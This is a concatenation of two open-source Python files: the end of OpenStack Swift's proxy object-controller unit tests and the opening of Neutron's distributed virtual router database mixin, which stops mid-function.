resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 201)
def test_PUT_if_none_match(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['if-none-match'] = '*'
req.headers['content-length'] = '0'
with set_http_connect(201, 201, 201):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 201)
def test_PUT_if_none_match_denied(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['if-none-match'] = '*'
req.headers['content-length'] = '0'
with set_http_connect(201, 412, 201):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 412)
def test_PUT_if_none_match_not_star(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['if-none-match'] = 'somethingelse'
req.headers['content-length'] = '0'
with set_http_connect():
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 400)
def test_PUT_connect_exceptions(self):
object_ring = self.app.get_object_ring(None)
self.app.sort_nodes = lambda n: n # disable shuffle
def test_status_map(statuses, expected):
self.app._error_limiting = {}
req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
body='test body')
with set_http_connect(*statuses):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, expected)
base_status = [201] * 3
# test happy path
test_status_map(list(base_status), 201)
for i in range(3):
self.assertEqual(node_error_count(
self.app, object_ring.devs[i]), 0)
# single node errors and test isolation
for i in range(3):
status_list = list(base_status)
status_list[i] = 503
test_status_map(status_list, 201)
for j in range(3):
self.assertEqual(node_error_count(
self.app, object_ring.devs[j]), 1 if j == i else 0)
# connect errors
test_status_map((201, Timeout(), 201, 201), 201)
self.assertEqual(node_error_count(
self.app, object_ring.devs[1]), 1)
test_status_map((Exception('kaboom!'), 201, 201, 201), 201)
self.assertEqual(node_error_count(
self.app, object_ring.devs[0]), 1)
# expect errors
test_status_map((201, 201, (503, None), 201), 201)
self.assertEqual(node_error_count(
self.app, object_ring.devs[2]), 1)
test_status_map(((507, None), 201, 201, 201), 201)
self.assertEqual(
node_error_count(self.app, object_ring.devs[0]),
self.app.error_suppression_limit + 1)
# response errors
test_status_map(((100, Timeout()), 201, 201), 201)
self.assertEqual(
node_error_count(self.app, object_ring.devs[0]), 1)
test_status_map((201, 201, (100, Exception())), 201)
self.assertEqual(
node_error_count(self.app, object_ring.devs[2]), 1)
test_status_map((201, (100, 507), 201), 201)
self.assertEqual(
node_error_count(self.app, object_ring.devs[1]),
self.app.error_suppression_limit + 1)
def test_GET_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
with set_http_connect(200):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 200)
def test_GET_error(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
with set_http_connect(503, 200):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 200)
def test_GET_handoff(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
codes = [503] * self.obj_ring.replicas + [200]
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 200)
def test_GET_not_found(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
codes = [404] * (self.obj_ring.replicas +
self.obj_ring.max_more_nodes)
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 404)
def test_DELETE_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
with set_http_connect(204, 204, 204):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 204)
def test_DELETE_missing_one(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
with set_http_connect(404, 204, 204):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 204)
def test_DELETE_half_not_found_statuses(self):
self.obj_ring.set_replicas(4)
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
with set_http_connect(404, 204, 404, 204):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 204)
def test_DELETE_half_not_found_headers_and_body(self):
# Transformed responses have bogus bodies and headers, so make sure we
# send the client headers and body from a real node's response.
self.obj_ring.set_replicas(4)
status_codes = (404, 404, 204, 204)
bodies = ('not found', 'not found', '', '')
headers = [{}, {}, {'Pick-Me': 'yes'}, {'Pick-Me': 'yes'}]
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
with set_http_connect(*status_codes, body_iter=bodies,
headers=headers):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 204)
self.assertEquals(resp.headers.get('Pick-Me'), 'yes')
self.assertEquals(resp.body, '')
def test_DELETE_not_found(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
with set_http_connect(404, 404, 204):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 404)
def test_DELETE_handoff(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
codes = [204] * self.obj_ring.replicas
with set_http_connect(507, *codes):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 204)
def test_POST_as_COPY_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='POST')
head_resp = [200] * self.obj_ring.replicas + \
[404] * self.obj_ring.max_more_nodes
put_resp = [201] * self.obj_ring.replicas
codes = head_resp + put_resp
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 202)
def test_POST_delete_at(self):
t = str(int(time.time() + 100))
req = swob.Request.blank('/v1/a/c/o', method='POST',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
post_headers = []
def capture_headers(ip, port, device, part, method, path, headers,
**kwargs):
if method == 'POST':
post_headers.append(headers)
x_newest_responses = [200] * self.obj_ring.replicas + \
[404] * self.obj_ring.max_more_nodes
post_resp = [200] * self.obj_ring.replicas
codes = x_newest_responses + post_resp
with set_http_connect(*codes, give_connect=capture_headers):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 200)
for given_headers in post_headers:
self.assertEquals(given_headers.get('X-Delete-At'), t)
self.assertTrue('X-Delete-At-Host' in given_headers)
self.assertTrue('X-Delete-At-Device' in given_headers)
self.assertTrue('X-Delete-At-Partition' in given_headers)
self.assertTrue('X-Delete-At-Container' in given_headers)
def test_POST_non_int_delete_after(self):
t = str(int(time.time() + 100)) + '.1'
req = swob.Request.blank('/v1/a/c/o', method='POST',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': t})
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('Non-integer X-Delete-After', resp.body)
def test_POST_negative_delete_after(self):
req = swob.Request.blank('/v1/a/c/o', method='POST',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': '-60'})
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('X-Delete-After in past', resp.body)
def test_POST_delete_at_non_integer(self):
t = str(int(time.time() + 100)) + '.1'
req = swob.Request.blank('/v1/a/c/o', method='POST',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('Non-integer X-Delete-At', resp.body)
def test_POST_delete_at_in_past(self):
t = str(int(time.time() - 100))
req = swob.Request.blank('/v1/a/c/o', method='POST',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('X-Delete-At in past', resp.body)
def test_PUT_converts_delete_after_to_delete_at(self):
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': '60'})
put_headers = []
def capture_headers(ip, port, device, part, method, path, headers,
**kwargs):
if method == 'PUT':
put_headers.append(headers)
codes = [201] * self.obj_ring.replicas
t = time.time()
with set_http_connect(*codes, give_connect=capture_headers):
with mock.patch('time.time', lambda: t):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 201)
expected_delete_at = str(int(t) + 60)
for given_headers in put_headers:
self.assertEquals(given_headers.get('X-Delete-At'),
expected_delete_at)
self.assertTrue('X-Delete-At-Host' in given_headers)
self.assertTrue('X-Delete-At-Device' in given_headers)
self.assertTrue('X-Delete-At-Partition' in given_headers)
self.assertTrue('X-Delete-At-Container' in given_headers)
def test_PUT_non_int_delete_after(self):
t = str(int(time.time() + 100)) + '.1'
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': t})
with set_http_connect():
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('Non-integer X-Delete-After', resp.body)
def test_PUT_negative_delete_after(self):
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': '-60'})
with set_http_connect():
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('X-Delete-After in past', resp.body)
def test_PUT_delete_at(self):
t = str(int(time.time() + 100))
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
put_headers = []
def capture_headers(ip, port, device, part, method, path, headers,
**kwargs):
if method == 'PUT':
put_headers.append(headers)
codes = [201] * self.obj_ring.replicas
with set_http_connect(*codes, give_connect=capture_headers):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 201)
for given_headers in put_headers:
self.assertEquals(given_headers.get('X-Delete-At'), t)
self.assertTrue('X-Delete-At-Host' in given_headers)
self.assertTrue('X-Delete-At-Device' in given_headers)
self.assertTrue('X-Delete-At-Partition' in given_headers)
self.assertTrue('X-Delete-At-Container' in given_headers)
def test_PUT_delete_at_non_integer(self):
t = str(int(time.time() - 100)) + '.1'
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
with set_http_connect():
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('Non-integer X-Delete-At', resp.body)
def test_PUT_delete_at_in_past(self):
t = str(int(time.time() - 100))
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
with set_http_connect():
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('X-Delete-At in past', resp.body)
def test_container_sync_put_x_timestamp_not_found(self):
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
self.container_info['storage_policy'] = policy_index
put_timestamp = utils.Timestamp(time.time()).normal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': put_timestamp})
codes = [201] * self.obj_ring.replicas
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_container_sync_put_x_timestamp_match(self):
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
self.container_info['storage_policy'] = policy_index
put_timestamp = utils.Timestamp(time.time()).normal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': put_timestamp})
ts_iter = itertools.repeat(put_timestamp)
codes = [409] * self.obj_ring.replicas
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_container_sync_put_x_timestamp_older(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
self.container_info['storage_policy'] = policy_index
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': ts.next().internal})
ts_iter = itertools.repeat(ts.next().internal)
codes = [409] * self.obj_ring.replicas
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_container_sync_put_x_timestamp_newer(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
orig_timestamp = ts.next().internal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': ts.next().internal})
ts_iter = itertools.repeat(orig_timestamp)
codes = [201] * self.obj_ring.replicas
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_container_sync_delete(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
req = swob.Request.blank(
'/v1/a/c/o', method='DELETE', headers={
'X-Timestamp': ts.next().internal})
codes = [409] * self.obj_ring.replicas
ts_iter = itertools.repeat(ts.next().internal)
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 409)
def test_put_x_timestamp_conflict(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': ts.next().internal})
ts_iter = iter([ts.next().internal, None, None])
codes = [409] + [201] * (self.obj_ring.replicas - 1)
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_container_sync_put_x_timestamp_race(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
put_timestamp = ts.next().internal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': put_timestamp})
# object nodes they respond 409 because another in-flight request
# finished and now the on disk timestamp is equal to the request.
put_ts = [put_timestamp] * self.obj_ring.replicas
codes = [409] * self.obj_ring.replicas
ts_iter = iter(put_ts)
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_container_sync_put_x_timestamp_unsynced_race(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
put_timestamp = ts.next().internal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': put_timestamp})
# only one in-flight request finished
put_ts = [None] * (self.obj_ring.replicas - 1)
put_resp = [201] * (self.obj_ring.replicas - 1)
put_ts += [put_timestamp]
put_resp += [409]
ts_iter = iter(put_ts)
codes = put_resp
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_COPY_simple(self):
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='COPY',
headers={'Content-Length': 0,
'Destination': 'c/o-copy'})
head_resp = [200] * self.obj_ring.replicas + \
[404] * self.obj_ring.max_more_nodes
put_resp = [201] * self.obj_ring.replicas
codes = head_resp + put_resp
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 201)
def test_HEAD_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='HEAD')
with set_http_connect(200):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 200)
def test_HEAD_x_newest(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='HEAD',
headers={'X-Newest': 'true'})
with set_http_connect(200, 200, 200):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 200)
def test_HEAD_x_newest_different_timestamps(self):
req = swob.Request.blank('/v1/a/c/o', method='HEAD',
headers={'X-Newest': 'true'})
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
timestamps = [next(ts) for i in range(3)]
newest_timestamp = timestamps[-1]
random.shuffle(timestamps)
backend_response_headers = [{
'X-Backend-Timestamp': t.internal,
'X-Timestamp': t.normal
} for t in timestamps]
with set_http_connect(200, 200, 200,
headers=backend_response_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['x-timestamp'], newest_timestamp.normal)
def test_HEAD_x_newest_with_two_vector_timestamps(self):
req = swob.Request.blank('/v1/a/c/o', method='HEAD',
headers={'X-Newest': 'true'})
ts = (utils.Timestamp(time.time(), offset=offset)
for offset in itertools.count())
timestamps = [next(ts) for i in range(3)]
newest_timestamp = timestamps[-1]
random.shuffle(timestamps)
backend_response_headers = [{
'X-Backend-Timestamp': t.internal,
'X-Timestamp': t.normal
} for t in timestamps]
with set_http_connect(200, 200, 200,
headers=backend_response_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['x-backend-timestamp'],
newest_timestamp.internal)
def test_HEAD_x_newest_with_some_missing(self):
req = swob.Request.blank('/v1/a/c/o', method='HEAD',
headers={'X-Newest': 'true'})
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
request_count = self.app.request_node_count(self.obj_ring.replicas)
backend_response_headers = [{
'x-timestamp': next(ts).normal,
} for i in range(request_count)]
responses = [404] * (request_count - 1)
responses.append(200)
request_log = []
def capture_requests(ip, port, device, part, method, path,
headers=None, **kwargs):
req = {
'ip': ip,
'port': port,
'device': device,
'part': part,
'method': method,
'path': path,
'headers': headers,
}
request_log.append(req)
with set_http_connect(*responses,
headers=backend_response_headers,
give_connect=capture_requests):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
for req in request_log:
self.assertEqual(req['method'], 'HEAD')
self.assertEqual(req['path'], '/a/c/o')
def test_PUT_log_info(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['x-copy-from'] = 'some/where'
req.headers['Content-Length'] = 0
# override FakeConn default resp headers to keep log_info clean
resp_headers = {'x-delete-at': None}
head_resp = [200] * self.obj_ring.replicas + \
[404] * self.obj_ring.max_more_nodes
put_resp = [201] * self.obj_ring.replicas
codes = head_resp + put_resp
with set_http_connect(*codes, headers=resp_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
self.assertEquals(
req.environ.get('swift.log_info'), ['x-copy-from:some/where'])
# and then check that we don't do that for originating POSTs
req = swift.common.swob.Request.blank('/v1/a/c/o')
req.method = 'POST'
req.headers['x-copy-from'] = 'else/where'
with set_http_connect(*codes, headers=resp_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
self.assertEquals(req.environ.get('swift.log_info'), None)
@patch_policies([
StoragePolicy(0, 'zero', True),
StoragePolicy(1, 'one'),
StoragePolicy(2, 'two'),
])
class TestObjControllerLegacyCache(TestObjController):
"""
This test pretends like memcache returned a stored value that should
resemble whatever "old" format. It catches KeyErrors you'd get if your
code was expecting some new format during a rolling upgrade.
"""
container_info = {
'read_acl': None,
'write_acl': None,
'sync_key': None,
'versions': None,
}
if __name__ == '__main__':
unittest.main()
| dpgoetz/swift | test/unit/proxy/controllers/test_obj.py | Python | apache-2.0 | 33,082 |
# Copyright (c) 2014 OpenStack Foundation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
import six
from neutron.api.v2 import attributes
from neutron.callbacks import events
from neutron.callbacks import exceptions
from neutron.callbacks import registry
from neutron.callbacks import resources
from neutron.common import constants as l3_const
from neutron.common import exceptions as n_exc
from neutron.common import utils as n_utils
from neutron.db import l3_attrs_db
from neutron.db import l3_db
from neutron.db import l3_dvrscheduler_db as l3_dvrsched_db
from neutron.db import models_v2
from neutron.extensions import l3
from neutron.extensions import portbindings
from neutron.i18n import _LI
from neutron import manager
from neutron.plugins.common import constants
from neutron.plugins.common import utils as p_utils
LOG = logging.getLogger(__name__)
router_distributed_opts = [
cfg.BoolOpt('router_distributed',
default=False,
help=_("System-wide flag to determine the type of router "
"that tenants can create. Only admin can override.")),
]
cfg.CONF.register_opts(router_distributed_opts)
class L3_NAT_with_dvr_db_mixin(l3_db.L3_NAT_db_mixin,
l3_attrs_db.ExtraAttributesMixin):
"""Mixin class to enable DVR support."""
router_device_owners = (
l3_db.L3_NAT_db_mixin.router_device_owners +
(l3_const.DEVICE_OWNER_DVR_INTERFACE,
l3_const.DEVICE_OWNER_ROUTER_SNAT,
l3_const.DEVICE_OWNER_AGENT_GW))
extra_attributes = (
l3_attrs_db.ExtraAttributesMixin.extra_attributes + [{
'name': "distributed",
'default': cfg.CONF.router_distributed
}])
def _create_router_db(self, context, router, tenant_id):
"""Create a router db object with dvr additions."""
router['distributed'] = is_distributed_router(router)
with context.session.begin(subtransactions=True):
router_db = super(
L3_NAT_with_dvr_db_mixin, self)._create_router_db(
context, router, tenant_id)
self._process_extra_attr_router_create(context, router_db, router)
return router_db
def _validate_router_migration(self, context, router_db, router_res):
"""Allow centralized -> distributed state transition only."""
if (router_db.extra_attributes.distributed and
router_res.get('distributed') is False):
LOG.info(_LI("Centralizing distributed router %s "
"is not supported"), router_db['id'])
raise n_exc.NotSupported(msg=_("Migration from distributed router "
"to centralized"))
elif (not router_db.extra_attributes.distributed and
router_res.get('distributed')):
# router should be disabled in order for upgrade
if router_db.admin_state_up:
msg = _('Cannot upgrade active router to distributed. Please '
'set router admin_state_up to False prior to upgrade.')
raise n_exc.BadRequest(resource='router', msg=msg)
# Notify advanced services of the imminent state transition
# for the router.
try:
kwargs = {'context': context, 'router': router_db}
registry.notify(
resources.ROUTER, events.BEFORE_UPDATE, self, **kwargs)
except exceptions.CallbackFailure as e:
with excutils.save_and_reraise_exception():
# NOTE(armax): preserve old check's behavior
if len(e.errors) == 1:
raise e.errors[0].error
raise l3.RouterInUse(router_id=router_db['id'],
reason=e)
def _update_distributed_attr(
self, context, router_id, router_db, data, gw_info):
"""Update the model to support the dvr case of a router."""
if data.get('distributed'):
old_owner = l3_const.DEVICE_OWNER_ROUTER_INTF
new_owner = l3_const.DEVICE_OWNER_DVR_INTERFACE
for rp in router_db.attached_ports.filter_by(port_type=old_owner):
rp.port_type = new_owner
rp.port.device_owner = new_owner
def _update_router_db(self, context, router_id, data, gw_info):
with context.session.begin(subtransactions=True):
router_db = super(
L3_NAT_with_dvr_db_mixin, self)._update_router_db(
context, router_id, data, gw_info)
migrating_to_distributed = (
not router_db.extra_attributes.distributed and
data.get('distributed') is True)
self._validate_router_migration(context, router_db, data)
router_db.extra_attributes.update(data)
self._update_distributed_attr(
context, router_id, router_db, data, gw_info)
if migrating_to_distributed:
if router_db['gw_port_id']:
# If the Legacy router is getting migrated to a DVR
# router, make sure to create corresponding
# snat interface ports that are to be consumed by
# the Service Node.
if not self._create_snat_intf_ports_if_not_exists(
context.elevated(), router_db):
LOG.debug("SNAT interface ports not created: %s",
router_db['id'])
cur_agents = self.list_l3_agents_hosting_router(
context, router_db['id'])['agents']
for agent in cur_agents:
self._unbind_router(context, router_db['id'],
agent['id'])
return router_db
def _delete_current_gw_port(self, context, router_id, router, new_network):
"""
Overriden here to handle deletion of dvr internal ports.
If there is a valid router update with gateway port to be deleted,
then go ahead and delete the csnat ports and the floatingip
agent gateway port associated with the dvr router.
"""
gw_ext_net_id = (
router.gw_port['network_id'] if router.gw_port else None)
super(L3_NAT_with_dvr_db_mixin,
self)._delete_current_gw_port(context, router_id,
router, new_network)
if (is_distributed_router(router) and
gw_ext_net_id != new_network):
self.delete_csnat_router_interface_ports(
context.elevated(), router)
# NOTE(Swami): Delete the Floatingip agent gateway port
# on all hosts when it is the last gateway port in the
# given external network.
filters = {'network_id': [gw_ext_net_id],
'device_owner': [l3_const.DEVICE_OWNER_ROUTER_GW]}
ext_net_gw_ports = self._core_plugin.get_ports(
context.elevated(), filters)
if not ext_net_gw_ports:
self.delete_floatingip_agent_gateway_port(
context.elevated(), None, gw_ext_net_id)
def _create_gw_port(self, context, router_id, router, new_network,
ext_ips):
super(L3_NAT_with_dvr_db_mixin,
self)._create_gw_port(context, router_id, router, new_network,
ext_ips)
# Make sure that the gateway port exists before creating the
# snat interface ports for distributed router.
if router.extra_attributes.distributed and router.gw_port:
snat_p_list = self._create_snat_intf_ports_if_not_exists(
context.elevated(), router)
if not snat_p_list:
LOG.debug("SNAT interface ports not created: %s", snat_p_list)
def _get_device_owner(self, context, router=None):
"""Get device_owner for the specified router."""
router_is_uuid = isinstance(router, six.string_types)
if router_is_uuid:
router = self._get_router(context, router)
if is_distributed_router(router):
return l3_const.DEVICE_OWNER_DVR_INTERFACE
return super(L3_NAT_with_dvr_db_mixin,
self)._get_device_owner(context, router)
def _get_interface_ports_for_network(self, context, network_id):
router_intf_qry = context.session.query(l3_db.RouterPort)
router_intf_qry = router_intf_qry.join(models_v2.Port)
return router_intf_qry.filter(
models_v2.Port.network_id == network_id,
l3_db.RouterPort.port_type.in_(l3_const.ROUTER_INTERFACE_OWNERS)
)
def _update_fip_assoc(self, context, fip, floatingip_db, external_port):
"""Override to create floating agent gw port for DVR.
Floating IP Agent gateway port will be created when a
floatingIP association happens.
"""
fip_port = fip.get('port_id')
super(L3_NAT_with_dvr_db_mixin, self)._update_fip_assoc(
context, fip, floatingip_db, external_port)
associate_fip = fip_port and floatingip_db['id']
if associate_fip and floatingip_db.get('router_id'):
admin_ctx = context.elevated()
router_dict = self.get_router(
admin_ctx, floatingip_db['router_id'])
# Check if distributed router and then create the
# FloatingIP agent gateway port
if router_dict.get('distributed'):
vm_hostid = self._get_vm_port_hostid(
context, fip_port)
if vm_hostid:
# FIXME (Swami): This FIP Agent Gateway port should be
# created only once and there should not be a duplicate
# for the same host. Until we find a good solution for
# augmenting multiple server requests we should use the
# existing flow.
fip_agent_port = (
self.create_fip_agent_gw_port_if_not_exists(
admin_ctx, external_port['network_id'],
vm_hostid))
LOG.debug("FIP Agent gateway port: %s", fip_agent_port)
def _get_floatingip_on_port(self, context, port_id=None):
"""Helper function to retrieve the fip associated with port."""
fip_qry = context.session.query(l3_db.FloatingIP)
floating_ip = fip_qry.filter_by(fixed_port_id=port_id)
return floating_ip.first()
def add_router_interface(self, context, router_id, interface_info):
add_by_port, add_by_sub = self._validate_interface_info(interface_info)
router = self._get_router(context, router_id)
device_owner = self._get_device_owner(context, router)
# This should be True unless adding an IPv6 prefix to an existing port
new_port = True
if add_by_port:
port, subnets = self._add_interface_by_port(
context, router, interface_info['port_id'], device_owner)
elif add_by_sub:
port, subnets, new_port = self._add_interface_by_subnet(
context, router, interface_info['subnet_id'], device_owner)
if new_port:
if router.extra_attributes.distributed and router.gw_port:
try:
admin_context = context.elevated()
self._add_csnat_router_interface_port(
admin_context, router, port['network_id'],
port['fixed_ips'][-1]['subnet_id'])
except Exception:
with excutils.save_and_reraise_exception():
# we need to preserve the original state prior
# the request by rolling back the port creation
# that led to new_port=True
self._core_plugin.delete_port(
admin_context, port['id'])
with context.session.begin(subtransactions=True):
router_port = l3_db.RouterPort(
port_id=port['id'],
router_id=router.id,
port_type=device_owner
)
context.session.add(router_port)
router_interface_info = self._make_router_interface_info(
router_id, port['tenant_id'], port['id'], subnets[-1]['id'],
[subnet['id'] for subnet in subnets])
self.notify_router_interface_action(
context, router_interface_info, 'add')
return router_interface_info
def _port_has_ipv6_address(self, port):
"""Overridden to return False if DVR SNAT port."""
if port['device_owner'] == l3_const.DEVICE_OWNER_ROUTER_SNAT:
return False
return super(L3_NAT_with_dvr_db_mixin,
self)._port_has_ipv6_address(port)
def _check_dvr_router_remove_required_and_notify_agent(
self, context, router, port, subnets):
if router.extra_attributes.distributed:
if router.gw_port and subnets[0]['id']:
self.delete_csnat_router_interface_ports(
context.elevated(), router, subnet_id=subnets[0]['id'])
plugin = manager.NeutronManager.get_service_plugins().get(
constants.L3_ROUTER_NAT)
l3_agents = plugin.get_l3_agents_hosting_routers(context,
[router['id']])
for l3_agent in l3_agents:
if not plugin.check_ports_exist_on_l3agent(context, l3_agent,
router['id']):
plugin.remove_router_from_l3_agent(
context, l3_agent['id'], router['id'])
router_interface_info = self._make_router_interface_info(
router['id'], port['tenant_id'], port['id'], subnets[0]['id'],
[subnet['id'] for subnet in subnets])
self.notify_router_interface_action(
context, router_interface_info, 'remove')
return router_interface_info
def remove_router_interface(self, context, router_id, interface_info):
remove_by_port, remove_by_subnet = (
self._validate_interface_info(interface_info, for_removal=True)
)
port_id = interface_info.get('port_id')
subnet_id = interface_info.get('subnet_id')
router = self._get_router(context, router_id)
device_owner = self._get_device_owner(context, router)
if remove_by_port:
port, subnets = self._remove_interface_by_port(
context, router_id, port_id, subnet_id, device_owner)
# remove_by_subnet is not used here, because the validation logic of
# _validate_interface_info ensures that at least one of remote_by_*
# is True.
else:
port, subnets = self._remove_interface_by_subnet(
context, router_id, subnet_id, device_owner)
router_interface_info = (
self._check_dvr_router_remove_required_and_notify_agent(
context, router, port, subnets))
return router_interface_info
def _get_snat_sync_interfaces(self, context, router_ids):
"""Query router interfaces that relate to list of router_ids."""
if not router_ids:
return []
qry = context.session.query(l3_db.RouterPort)
qry = qry.filter(
l3_db.RouterPort.router_id.in_(router_ids),
l3_db.RouterPort.port_type == l3_const.DEVICE_OWNER_ROUTER_SNAT
)
interfaces = collections.defaultdict(list)
for rp in qry:
interfaces[rp.router_id].append(
self._core_plugin._make_port_dict(rp.port, None))
LOG.debug("Return the SNAT ports: %s", interfaces)
return interfaces
def _build_routers_list(self, context, routers, gw_ports):
# Perform a single query up front for all routers
if not routers:
return []
router_ids = [r['id'] for r in routers]
snat_binding = l3_dvrsched_db.CentralizedSnatL3AgentBinding
query = (context.session.query(snat_binding).
filter(snat_binding.router_id.in_(router_ids))).all()
bindings = dict((b.router_id, b) for b in query)
for rtr in routers:
gw_port_id = rtr['gw_port_id']
# Collect gw ports only if available
